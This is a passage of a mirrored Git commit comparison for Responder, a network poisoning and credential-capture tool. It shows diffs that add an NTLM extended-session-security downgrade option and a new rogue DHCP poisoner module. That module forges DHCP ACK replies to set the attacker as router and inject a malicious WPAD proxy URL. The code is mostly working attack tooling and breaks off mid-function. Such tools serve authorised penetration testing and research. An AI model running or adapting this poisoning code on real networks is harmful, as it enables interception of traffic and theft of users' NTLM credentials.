mirror of
https://github.com/lgandx/Responder.git
synced 2025-12-10 09:49:06 +00:00
Compare commits
10 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
7bdfe7bbdd | ||
|
|
c449b6bcb9 | ||
|
|
88ea72908c | ||
|
|
3fe574683b | ||
|
dcb80d992e | ||
|
|
51f8ab4368 | ||
|
|
baf80aa4f0 | ||
|
|
ae1c2be51c | ||
|
|
4231532926 | ||
|
|
350058c179 |
3
README.md
Normal file → Executable file
3
README.md
Normal file → Executable file
@@ -16,7 +16,7 @@ The concept behind this is to target our answers, and be stealthier on the netwo
|
||||
|
||||
- Built-in SMB Auth server.
|
||||
|
||||
Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2022, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set. SMBv2 has also been implemented and is supported by default.
|
||||
Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2022, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set. If --disable-ess is set, extended session security will be disabled for NTLMv1 authentication. SMBv2 has also been implemented and is supported by default.
|
||||
|
||||
- Built-in MSSQL Auth server.
|
||||
|
||||
@@ -163,6 +163,7 @@ Options:
|
||||
with -r. Default: Off
|
||||
--lm Force LM hashing downgrade for Windows XP/2003 and
|
||||
earlier. Default: Off
|
||||
--disable-ess Force ESS downgrade. Default: Off
|
||||
-v, --verbose Increase verbosity.
|
||||
|
||||
|
||||
|
||||
23
Responder.py
23
Responder.py
@@ -1,4 +1,4 @@
|
||||
#!/usr/bin/env python
|
||||
#!/usr/bin/env python3
|
||||
# This file is part of Responder, a network take-over set of tools
|
||||
# created and maintained by Laurent Gaffie.
|
||||
# email: laurent.gaffie@gmail.com
|
||||
@@ -31,10 +31,9 @@ parser.add_option('-I','--interface', action="store", help="Network in
|
||||
parser.add_option('-i','--ip', action="store", help="Local IP to use \033[1m\033[31m(only for OSX)\033[0m", dest="OURIP", metavar="10.0.0.21", default=None)
|
||||
|
||||
parser.add_option('-e', "--externalip", action="store", help="Poison all requests with another IP address than Responder's one.", dest="ExternalIP", metavar="10.0.0.22", default=None)
|
||||
|
||||
parser.add_option('-b', '--basic', action="store_true", help="Return a Basic HTTP authentication. Default: NTLM", dest="Basic", default=False)
|
||||
parser.add_option('-r', '--wredir', action="store_true", help="Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network. Default: False", dest="Wredirect", default=False)
|
||||
parser.add_option('-d', '--NBTNSdomain', action="store_true", help="Enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network. Default: False", dest="NBTNSDomain", default=False)
|
||||
parser.add_option('-d', '--DHCP', action="store_true", help="Enable answers for DHCP broadcast requests. This option will inject a WPAD server in the DHCP response. Default: False", dest="DHCP_On_Off", default=False)
|
||||
parser.add_option('-f','--fingerprint', action="store_true", help="This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.", dest="Finger", default=False)
|
||||
parser.add_option('-w','--wpad', action="store_true", help="Start the WPAD rogue proxy server. Default value is False", dest="WPAD_On_Off", default=False)
|
||||
parser.add_option('-u','--upstream-proxy', action="store", help="Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)", dest="Upstream_Proxy", default=None)
|
||||
@@ -43,13 +42,14 @@ parser.add_option('-F','--ForceWpadAuth', action="store_true", help="Force NTLM
|
||||
parser.add_option('-P','--ProxyAuth', action="store_true", help="Force NTLM (transparently)/Basic (prompt) authentication for the proxy. WPAD doesn't need to be ON. This option is highly effective when combined with -r. Default: False", dest="ProxyAuth_On_Off", default=False)
|
||||
|
||||
parser.add_option('--lm', action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False)
|
||||
parser.add_option('--disable-ess', action="store_true", help="Force ESS downgrade. Default: False", dest="NOESS_On_Off", default=False)
|
||||
parser.add_option('-v','--verbose', action="store_true", help="Increase verbosity.", dest="Verbose")
|
||||
options, args = parser.parse_args()
|
||||
|
||||
if not os.geteuid() == 0:
|
||||
print(color("[!] Responder must be run as root."))
|
||||
sys.exit(-1)
|
||||
elif options.OURIP is None and IsOsX() is True:
|
||||
elif options.OURIP == None and IsOsX() == True:
|
||||
print("\n\033[1m\033[31mOSX detected, -i mandatory option is missing\033[0m\n")
|
||||
parser.print_help()
|
||||
exit(-1)
|
||||
@@ -61,9 +61,6 @@ StartupMessage()
|
||||
|
||||
settings.Config.ExpandIPRanges()
|
||||
|
||||
if settings.Config.AnalyzeMode:
|
||||
print(color('[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1))
|
||||
|
||||
#Create the DB, before we start Responder.
|
||||
CreateResponderDb()
|
||||
|
||||
@@ -266,6 +263,10 @@ def main():
|
||||
from servers.WinRM import WinRM
|
||||
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 5985, WinRM,)))
|
||||
|
||||
if settings.Config.WinRM_On_Off:
|
||||
from servers.WinRM import WinRM
|
||||
threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 5986, WinRM,)))
|
||||
|
||||
if settings.Config.SSL_On_Off:
|
||||
from servers.HTTP import HTTP
|
||||
threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 443, HTTP,)))
|
||||
@@ -338,8 +339,16 @@ def main():
|
||||
thread.setDaemon(True)
|
||||
thread.start()
|
||||
|
||||
|
||||
print(color('\n[+]', 2, 1) + " Listening for events...\n")
|
||||
|
||||
if settings.Config.AnalyzeMode:
|
||||
print(color('[+] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1))
|
||||
|
||||
if settings.Config.DHCP_On_Off:
|
||||
from poisoners.DHCP import DHCP
|
||||
DHCP()
|
||||
|
||||
while True:
|
||||
time.sleep(1)
|
||||
|
||||
|
||||
123
packets.py
Normal file → Executable file
123
packets.py
Normal file → Executable file
@@ -202,6 +202,9 @@ class MDNS_Ans(Packet):
|
||||
def calculate(self):
|
||||
self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"])
|
||||
|
||||
################### DHCP SRV ######################
|
||||
|
||||
|
||||
##### HTTP Packets #####
|
||||
class NTLM_Challenge(Packet):
|
||||
fields = OrderedDict([
|
||||
@@ -791,7 +794,7 @@ class LDAPNTLMChallenge(Packet):
|
||||
("NTLMSSPNtWorkstationLen", "\x1e\x00"),
|
||||
("NTLMSSPNtWorkstationMaxLen", "\x1e\x00"),
|
||||
("NTLMSSPNtWorkstationBuffOffset", "\x38\x00\x00\x00"),
|
||||
("NTLMSSPNtNegotiateFlags", "\x15\x82\x89\xe2"),
|
||||
("NTLMSSPNtNegotiateFlags", "\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"),
|
||||
("NTLMSSPNtServerChallenge", "\x81\x22\x33\x34\x55\x46\xe7\x88"),
|
||||
("NTLMSSPNtReserved", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
||||
("NTLMSSPNtTargetInfoLen", "\x94\x00"),
|
||||
@@ -1197,7 +1200,7 @@ class SMBNegoAns(Packet):
|
||||
("NegHintTag0ASNLen", "\x17"),
|
||||
("NegHintFinalASNId", "\x1b"),
|
||||
("NegHintFinalASNLen", "\x15"),
|
||||
("NegHintFinalASNStr", settings.Config.MachineNego),
|
||||
("NegHintFinalASNStr", "not_defined_in_RFC4178@please_ignore"),
|
||||
])
|
||||
|
||||
def calculate(self):
|
||||
@@ -1331,7 +1334,7 @@ class SMBSession1Data(Packet):
|
||||
("NTLMSSPNtWorkstationLen","\x1e\x00"),
|
||||
("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
|
||||
("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
|
||||
("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"),
|
||||
("NTLMSSPNtNegotiateFlags","\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"),
|
||||
("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"),
|
||||
("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
|
||||
("NTLMSSPNtTargetInfoLen","\x94\x00"),
|
||||
@@ -1576,7 +1579,7 @@ class SMB2NegoAns(Packet):
|
||||
("NegHintTag0ASNLen", "\x26"),
|
||||
("NegHintFinalASNId", "\x1b"),
|
||||
("NegHintFinalASNLen", "\x24"),
|
||||
("NegHintFinalASNStr", settings.Config.MachineName+'@'+settings.Config.DomainName),
|
||||
("NegHintFinalASNStr", "not_defined_in_RFC4178@please_ignore"),
|
||||
])
|
||||
|
||||
def calculate(self):
|
||||
@@ -1651,7 +1654,7 @@ class SMB2Session1Data(Packet):
|
||||
("NTLMSSPNtWorkstationLen","\x1e\x00"),
|
||||
("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
|
||||
("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
|
||||
("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"),
|
||||
("NTLMSSPNtNegotiateFlags","\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"),
|
||||
("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"),
|
||||
("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
|
||||
("NTLMSSPNtTargetInfoLen","\x94\x00"),
|
||||
@@ -2143,3 +2146,113 @@ class RPCNTLMNego(Packet):
|
||||
|
||||
self.fields["FragLen"] = StructWithLenPython2or3("<h",len(Data))
|
||||
|
||||
################### Mailslot NETLOGON ######################
|
||||
class NBTUDPHeader(Packet):
|
||||
fields = OrderedDict([
|
||||
("MessType", "\x11"),
|
||||
("MoreFrag", "\x02"),
|
||||
("TID", "\x82\x92"),
|
||||
("SrcIP", "0.0.0.0"),
|
||||
("SrcPort", "\x00\x8a"), ##Always 138
|
||||
("DatagramLen", "\x00\x00"),
|
||||
("PacketOffset", "\x00\x00"),
|
||||
("ClientNBTName", ""),
|
||||
("DstNBTName", ""),
|
||||
("Data", ""),
|
||||
])
|
||||
|
||||
def calculate(self):
|
||||
self.fields["SrcIP"] = RespondWithIPAton()
|
||||
## DatagramLen.
|
||||
DataGramLen = str(self.fields["PacketOffset"])+str(self.fields["ClientNBTName"])+str(self.fields["DstNBTName"])+str(self.fields["Data"])
|
||||
self.fields["DatagramLen"] = StructWithLenPython2or3(">h",len(DataGramLen))
|
||||
|
||||
class SMBTransMailslot(Packet):
|
||||
fields = OrderedDict([
|
||||
("Wordcount", "\x11"),
|
||||
("TotalParamCount", "\x00\x00"),
|
||||
("TotalDataCount", "\x00\x00"),
|
||||
("MaxParamCount", "\x02\x00"),
|
||||
("MaxDataCount", "\x00\x00"),
|
||||
("MaxSetupCount", "\x00"),
|
||||
("Reserved", "\x00"),
|
||||
("Flags", "\x00\x00"),
|
||||
("Timeout", "\xff\xff\xff\xff"),
|
||||
("Reserved2", "\x00\x00"),
|
||||
("ParamCount", "\x00\x00"),
|
||||
("ParamOffset", "\x00\x00"),
|
||||
("DataCount", "\x00\x00"),
|
||||
("DataOffset", "\x00\x00"),
|
||||
("SetupCount", "\x03"),
|
||||
("Reserved3", "\x00"),
|
||||
("Opcode", "\x01\x00"),
|
||||
("Priority", "\x00\x00"),
|
||||
("Class", "\x02\x00"),
|
||||
("Bcc", "\x00\x00"),
|
||||
("MailSlot", "\\MAILSLOT\\NET\\NETLOGON"),
|
||||
("MailSlotNull", "\x00"),
|
||||
("Padding", "\x00\x00\x00"),
|
||||
("Data", ""),
|
||||
])
|
||||
|
||||
def calculate(self):
|
||||
#Padding
|
||||
if len(str(self.fields["Data"]))%2==0:
|
||||
self.fields["Padding"] = "\x00\x00\x00\x00"
|
||||
else:
|
||||
self.fields["Padding"] = "\x00\x00\x00"
|
||||
BccLen = str(self.fields["MailSlot"])+str(self.fields["MailSlotNull"])+str(self.fields["Padding"])+str(self.fields["Data"])
|
||||
PacketOffsetLen = str(self.fields["Wordcount"])+str(self.fields["TotalParamCount"])+str(self.fields["TotalDataCount"])+str(self.fields["MaxParamCount"])+str(self.fields["MaxDataCount"])+str(self.fields["MaxSetupCount"])+str(self.fields["Reserved"])+str(self.fields["Flags"])+str(self.fields["Timeout"])+str(self.fields["Reserved2"])+str(self.fields["ParamCount"])+str(self.fields["ParamOffset"])+str(self.fields["DataCount"])+str(self.fields["DataOffset"])+str(self.fields["SetupCount"])+str(self.fields["Reserved3"])+str(self.fields["Opcode"])+str(self.fields["Priority"])+str(self.fields["Class"])+str(self.fields["Bcc"])+str(self.fields["MailSlot"])+str(self.fields["MailSlotNull"])+str(self.fields["Padding"])
|
||||
|
||||
self.fields["DataCount"] = StructWithLenPython2or3("<h",len(str(self.fields["Data"])))
|
||||
self.fields["TotalDataCount"] = StructWithLenPython2or3("<h",len(str(self.fields["Data"])))
|
||||
self.fields["DataOffset"] = StructWithLenPython2or3("<h",len(PacketOffsetLen)+32)
|
||||
self.fields["ParamOffset"] = StructWithLenPython2or3("<h",len(PacketOffsetLen)+32)
|
||||
self.fields["Bcc"] = StructWithLenPython2or3("<h",len(BccLen))
|
||||
|
||||
class SamLogonResponseEx(Packet):
|
||||
fields = OrderedDict([
|
||||
("Cmd", "\x17\x00"),
|
||||
("Sbz", "\x00\x00"),
|
||||
("Flags", "\xfd\x03\x00\x00"),
|
||||
("DomainGUID", "\xe7\xfd\xf2\x4a\x4f\x98\x8b\x49\xbb\xd3\xcd\x34\xc7\xba\x57\x70"),
|
||||
("ForestName", "\x04\x73\x6d\x62\x33\x05\x6c\x6f\x63\x61\x6c"),
|
||||
("ForestNameNull", "\x00"),
|
||||
("ForestDomainName", "\x04\x73\x6d\x62\x33\x05\x6c\x6f\x63\x61\x6c"),
|
||||
("ForestDomainNull", "\x00"),
|
||||
("DNSName", "\x0a\x73\x65\x72\x76\x65\x72\x32\x30\x30\x33"),
|
||||
("DNSPointer", "\xc0\x18"),
|
||||
("DomainName", "\x04\x53\x4d\x42\x33"),
|
||||
("DomainTerminator", "\x00"),
|
||||
("ServerLen", "\x0a"),
|
||||
("ServerName", settings.Config.MachineName),
|
||||
("ServerTerminator", "\x00"),
|
||||
("UsernameLen", "\x10"),
|
||||
("Username", "LGANDX"),
|
||||
("UserTerminator", "\x00"),
|
||||
("SrvSiteNameLen", "\x17"),
|
||||
("SrvSiteName", "Default-First-Site-Name"),
|
||||
("SrvSiteNameNull", "\x00"),
|
||||
("Pointer", "\xc0"),
|
||||
("PointerOffset", "\x5c"),
|
||||
("DCAddrSize", "\x10"),
|
||||
("AddrType", "\x02\x00"),
|
||||
("Port", "\x00\x00"),
|
||||
("DCAddress", "\xc0\xab\x01\x65"),
|
||||
("SinZero", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
||||
("Version", "\x0d\x00\x00\x00"),
|
||||
("LmToken", "\xff\xff"),
|
||||
("LmToken2", "\xff\xff"),
|
||||
])
|
||||
|
||||
def calculate(self):
|
||||
Offset = str(self.fields["Cmd"])+str(self.fields["Sbz"])+str(self.fields["Flags"])+str(self.fields["DomainGUID"])+str(self.fields["ForestName"])+str(self.fields["ForestNameNull"])+str(self.fields["ForestDomainName"])+str(self.fields["ForestDomainNull"])+str(self.fields["DNSName"])+str(self.fields["DNSPointer"])+str(self.fields["DomainName"])+str(self.fields["DomainTerminator"])+str(self.fields["ServerLen"])+str(self.fields["ServerName"])+str(self.fields["ServerTerminator"])+str(self.fields["UsernameLen"])+str(self.fields["Username"])+str(self.fields["UserTerminator"])
|
||||
|
||||
DcLen = str(self.fields["AddrType"])+str(self.fields["Port"])+str(self.fields["DCAddress"])+str(self.fields["SinZero"])
|
||||
self.fields["DCAddress"] = RespondWithIPAton()
|
||||
self.fields["ServerLen"] = StructWithLenPython2or3("<B",len(str(self.fields["ServerName"])))
|
||||
self.fields["UsernameLen"] = StructWithLenPython2or3("<B",len(str(self.fields["Username"])))
|
||||
self.fields["SrvSiteNameLen"] = StructWithLenPython2or3("<B",len(str(self.fields["SrvSiteName"])))
|
||||
self.fields["DCAddrSize"] = StructWithLenPython2or3("<B",len(DcLen))
|
||||
self.fields["PointerOffset"] = StructWithLenPython2or3("<B",len(Offset))
|
||||
|
||||
|
||||
309
poisoners/DHCP.py
Executable file
309
poisoners/DHCP.py
Executable file
@@ -0,0 +1,309 @@
|
||||
#!/usr/bin/env python
|
||||
# This file is part of Responder, a network take-over set of tools
|
||||
# created and maintained by Laurent Gaffie.
|
||||
# email: laurent.gaffie@gmail.com
|
||||
# This program is free software: you can redistribute it and/or modify
|
||||
# it under the terms of the GNU General Public License as published by
|
||||
# the Free Software Foundation, either version 3 of the License, or
|
||||
# (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful,
|
||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
# GNU General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||
import sys
|
||||
if (sys.version_info < (3, 0)):
|
||||
sys.exit('This script is meant to be run with Python3')
|
||||
|
||||
import struct
|
||||
import optparse
|
||||
import configparser
|
||||
import os
|
||||
import codecs
|
||||
import netifaces
|
||||
import binascii
|
||||
|
||||
BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
|
||||
sys.path.insert(0, BASEDIR)
|
||||
from odict import OrderedDict
|
||||
from utils import *
|
||||
|
||||
def color(txt, code = 1, modifier = 0):
|
||||
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
|
||||
|
||||
#Python version
|
||||
if (sys.version_info > (3, 0)):
|
||||
PY2OR3 = "PY3"
|
||||
else:
|
||||
PY2OR3 = "PY2"
|
||||
|
||||
def StructWithLenPython2or3(endian,data):
|
||||
#Python2...
|
||||
if PY2OR3 == "PY2":
|
||||
return struct.pack(endian, data)
|
||||
#Python3...
|
||||
else:
|
||||
return struct.pack(endian, data).decode('latin-1')
|
||||
|
||||
def NetworkSendBufferPython2or3(data):
|
||||
if PY2OR3 == "PY2":
|
||||
return str(data)
|
||||
else:
|
||||
return bytes(str(data), 'latin-1')
|
||||
|
||||
def NetworkRecvBufferPython2or3(data):
|
||||
if PY2OR3 == "PY2":
|
||||
return str(data)
|
||||
else:
|
||||
return str(data.decode('latin-1'))
|
||||
|
||||
class Packet():
|
||||
fields = OrderedDict([
|
||||
("data", ""),
|
||||
])
|
||||
def __init__(self, **kw):
|
||||
self.fields = OrderedDict(self.__class__.fields)
|
||||
for k,v in kw.items():
|
||||
if callable(v):
|
||||
self.fields[k] = v(self.fields[k])
|
||||
else:
|
||||
self.fields[k] = v
|
||||
def __str__(self):
|
||||
return "".join(map(str, self.fields.values()))
|
||||
|
||||
config = configparser.ConfigParser()
|
||||
config.read(os.path.join(BASEDIR,'Responder.conf'))
|
||||
RespondTo = [_f for _f in [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')] if _f]
|
||||
DontRespondTo = [_f for _f in [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')] if _f]
|
||||
Interface = settings.Config.Interface
|
||||
Responder_IP = FindLocalIP(Interface, None)
|
||||
ROUTERIP = Responder_IP # Set to Responder_IP in case we fall on a static IP network and we don't get a DHCP Offer. This var will be updated with the real dhcp IP if present.
|
||||
NETMASK = "255.255.255.0"
|
||||
DNSIP = "0.0.0.0"
|
||||
DNSIP2 = "0.0.0.0"
|
||||
DNSNAME = "lan"
|
||||
WPADSRV = "http://"+Responder_IP+"/wpad.dat"
|
||||
Respond_To_Requests = True
|
||||
DHCPClient = []
|
||||
|
||||
def GetMacAddress(Interface):
|
||||
mac = netifaces.ifaddresses(Interface)[netifaces.AF_LINK][0]['addr']
|
||||
return binascii.unhexlify(mac.replace(':', '')).decode('latin-1')
|
||||
|
||||
##### IP Header #####
|
||||
class IPHead(Packet):
|
||||
fields = OrderedDict([
|
||||
("Version", "\x45"),
|
||||
("DiffServices", "\x00"),
|
||||
("TotalLen", "\x00\x00"),
|
||||
("Ident", "\x00\x00"),
|
||||
("Flags", "\x00\x00"),
|
||||
("TTL", "\x40"),
|
||||
("Protocol", "\x11"),
|
||||
("Checksum", "\x00\x00"),
|
||||
("SrcIP", ""),
|
||||
("DstIP", ""),
|
||||
])
|
||||
|
||||
class UDP(Packet):
|
||||
fields = OrderedDict([
|
||||
("SrcPort", "\x00\x43"),
|
||||
("DstPort", "\x00\x44"),
|
||||
("Len", "\x00\x00"),
|
||||
("Checksum", "\x00\x00"),
|
||||
("Data", "\x00\x00"),
|
||||
])
|
||||
|
||||
def calculate(self):
|
||||
self.fields["Len"] = StructWithLenPython2or3(">h",len(str(self.fields["Data"]))+8)
|
||||
|
||||
class DHCPDiscover(Packet):
|
||||
fields = OrderedDict([
|
||||
("MessType", "\x01"),
|
||||
("HdwType", "\x01"),
|
||||
("HdwLen", "\x06"),
|
||||
("Hops", "\x00"),
|
||||
("Tid", os.urandom(4).decode('latin-1')),
|
||||
("ElapsedSec", "\x00\x01"),
|
||||
("BootpFlags", "\x80\x00"),
|
||||
("ActualClientIP", "\x00\x00\x00\x00"),
|
||||
("GiveClientIP", "\x00\x00\x00\x00"),
|
||||
("NextServerIP", "\x00\x00\x00\x00"),
|
||||
("RelayAgentIP", "\x00\x00\x00\x00"),
|
||||
("ClientMac", os.urandom(6).decode('latin-1')),#Needs to be random.
|
||||
("ClientMacPadding", "\x00" *10),
|
||||
("ServerHostname", "\x00" * 64),
|
||||
("BootFileName", "\x00" * 128),
|
||||
("MagicCookie", "\x63\x82\x53\x63"),
|
||||
("DHCPCode", "\x35"), #DHCP Message
|
||||
("DHCPCodeLen", "\x01"),
|
||||
("DHCPOpCode", "\x01"), #Msgtype(Discover)
|
||||
("Op55", "\x37"),
|
||||
("Op55Len", "\x0b"),
|
||||
("Op55Str", "\x01\x03\x0c\x0f\x06\x1a\x21\x79\x77\x2a\x78"),#Requested info.
|
||||
("Op12", "\x0c"),
|
||||
("Op12Len", "\x09"),
|
||||
("Op12Str", settings.Config.DHCPHostname),#random str.
|
||||
("Op255", "\xff"),
|
||||
("Padding", "\x00"),
|
||||
])
|
||||
|
||||
def calculate(self):
|
||||
self.fields["ClientMac"] = GetMacAddress(Interface)
|
||||
|
||||
class DHCPACK(Packet):
|
||||
fields = OrderedDict([
|
||||
("MessType", "\x02"),
|
||||
("HdwType", "\x01"),
|
||||
("HdwLen", "\x06"),
|
||||
("Hops", "\x00"),
|
||||
("Tid", "\x11\x22\x33\x44"),
|
||||
("ElapsedSec", "\x00\x00"),
|
||||
("BootpFlags", "\x00\x00"),
|
||||
("ActualClientIP", "\x00\x00\x00\x00"),
|
||||
("GiveClientIP", "\x00\x00\x00\x00"),
|
||||
("NextServerIP", "\x00\x00\x00\x00"),
|
||||
("RelayAgentIP", "\x00\x00\x00\x00"),
|
||||
("ClientMac", "\xff\xff\xff\xff\xff\xff"),
|
||||
("ClientMacPadding", "\x00" *10),
|
||||
("ServerHostname", "\x00" * 64),
|
||||
("BootFileName", "\x00" * 128),
|
||||
("MagicCookie", "\x63\x82\x53\x63"),
|
||||
("DHCPCode", "\x35"), #DHCP Message
|
||||
("DHCPCodeLen", "\x01"),
|
||||
("DHCPOpCode", "\x05"), #Msgtype(ACK)
|
||||
("Op54", "\x36"),
|
||||
("Op54Len", "\x04"),
|
||||
("Op54Str", ""), #DHCP Server
|
||||
("Op51", "\x33"),
|
||||
("Op51Len", "\x04"),
|
||||
("Op51Str", "\x00\x00\x00\x0a"), #Lease time
|
||||
("Op1", "\x01"),
|
||||
("Op1Len", "\x04"),
|
||||
("Op1Str", ""), #Netmask
|
||||
("Op15", "\x0f"),
|
||||
("Op15Len", "\x0e"),
|
||||
("Op15Str", ""), #DNS Name
|
||||
("Op3", "\x03"),
|
||||
("Op3Len", "\x04"),
|
||||
("Op3Str", ""), #Router
|
||||
("Op6", "\x06"),
|
||||
("Op6Len", "\x08"),
|
||||
("Op6Str", ""), #DNS Servers
|
||||
("Op252", "\xfc"),
|
||||
("Op252Len", "\x04"),
|
||||
("Op252Str", ""), #Wpad Server
|
||||
("Op255", "\xff"),
|
||||
("Padding", "\x00"),
|
||||
])
|
||||
|
||||
def calculate(self):
|
||||
self.fields["Op54Str"] = socket.inet_aton(ROUTERIP).decode('latin-1')
|
||||
self.fields["Op1Str"] = socket.inet_aton(NETMASK).decode('latin-1')
|
||||
self.fields["Op3Str"] = socket.inet_aton(ROUTERIP).decode('latin-1')
|
||||
self.fields["Op6Str"] = socket.inet_aton(DNSIP).decode('latin-1')+socket.inet_aton(DNSIP2).decode('latin-1')
|
||||
self.fields["Op15Str"] = DNSNAME
|
||||
self.fields["Op252Str"] = WPADSRV
|
||||
self.fields["Op15Len"] = StructWithLenPython2or3(">b",len(str(self.fields["Op15Str"])))
|
||||
self.fields["Op252Len"] = StructWithLenPython2or3(">b",len(str(self.fields["Op252Str"])))
|
||||
|
||||
def RespondToThisIP(ClientIp):
|
||||
if ClientIp.startswith('127.0.0.'):
|
||||
return False
|
||||
elif RespondTo and ClientIp not in RespondTo:
|
||||
return False
|
||||
elif ClientIp in RespondTo or RespondTo == []:
|
||||
if ClientIp not in DontRespondTo:
|
||||
return True
|
||||
return False
|
||||
|
||||
def ParseSrcDSTAddr(data):
|
||||
SrcIP = socket.inet_ntoa(data[0][26:30])
|
||||
DstIP = socket.inet_ntoa(data[0][30:34])
|
||||
SrcPort = struct.unpack('>H',data[0][34:36])[0]
|
||||
DstPort = struct.unpack('>H',data[0][36:38])[0]
|
||||
return SrcIP, SrcPort, DstIP, DstPort
|
||||
|
||||
def FindIP(data):
|
||||
data = data.decode('latin-1')
|
||||
IP = ''.join(re.findall(r'(?<=\x32\x04)[^EOF]*', data))
|
||||
return ''.join(IP[0:4]).encode('latin-1')
|
||||
|
||||
def ParseDHCPCode(data, ClientIP):
|
||||
global DHCPClient
|
||||
global ROUTERIP
|
||||
PTid = data[4:8]
|
||||
Seconds = data[8:10]
|
||||
CurrentIP = socket.inet_ntoa(data[12:16])
|
||||
RequestedIP = socket.inet_ntoa(data[16:20])
|
||||
MacAddr = data[28:34]
|
||||
MacAddrStr = ':'.join('%02x' % ord(m) for m in MacAddr.decode('latin-1')).upper()
|
||||
OpCode = data[242:243]
|
||||
RequestIP = data[245:249]
|
||||
|
||||
if DHCPClient.count(MacAddrStr) >= 4:
|
||||
return "'%s' has been poisoned more than 4 times. Ignoring..." % MacAddrStr
|
||||
|
||||
if OpCode == b"\x02" and Respond_To_Requests: # DHCP Offer
|
||||
ROUTERIP = ClientIP
|
||||
return 'Found DHCP server IP: %s, now waiting for incoming requests...' % (ROUTERIP)
|
||||
|
||||
elif OpCode == b"\x03" and Respond_To_Requests: # DHCP Request
|
||||
IP = FindIP(data)
|
||||
if IP:
|
||||
IPConv = socket.inet_ntoa(IP)
|
||||
if RespondToThisIP(IPConv):
|
||||
IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=IP.decode('latin-1'))
|
||||
Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), GiveClientIP=IP.decode('latin-1'), ElapsedSec=Seconds.decode('latin-1'))
|
||||
Packet.calculate()
|
||||
Buffer = UDP(Data = Packet)
|
||||
Buffer.calculate()
|
||||
SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 68))
|
||||
DHCPClient.append(MacAddrStr)
|
||||
return 'Acknowledged DHCP Request for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, IPConv, MacAddrStr)
|
||||
|
||||
elif OpCode == b"\x01" and Respond_To_Requests: # DHCP Discover
|
||||
IP = FindIP(data)
|
||||
if IP:
|
||||
IPConv = socket.inet_ntoa(IP)
|
||||
if RespondToThisIP(IPConv):
|
||||
IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=IP.decode('latin-1'))
|
||||
Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), GiveClientIP=IP.decode('latin-1'), DHCPOpCode="\x02", ElapsedSec=Seconds.decode('latin-1'))
|
||||
Packet.calculate()
|
||||
Buffer = UDP(Data = Packet)
|
||||
Buffer.calculate()
|
||||
SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 0))
|
||||
DHCPClient.append(MacAddrStr)
|
||||
return 'Acknowledged DHCP Discover for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, IPConv, MacAddrStr)
|
||||
|
||||
def SendDiscover():
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
|
||||
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
|
||||
IP_Header = IPHead(SrcIP = socket.inet_aton('0.0.0.0').decode('latin-1'), DstIP=socket.inet_aton('255.255.255.255').decode('latin-1'))
|
||||
Packet = DHCPDiscover()
|
||||
Packet.calculate()
|
||||
Buffer = UDP(SrcPort="\x00\x44", DstPort="\x00\x43",Data = Packet)
|
||||
Buffer.calculate()
|
||||
s.sendto(NetworkSendBufferPython2or3(str(IP_Header)+str(Buffer)), ('255.255.255.255', 67))
|
||||
|
||||
def SendDHCP(packet,Host):
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
|
||||
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
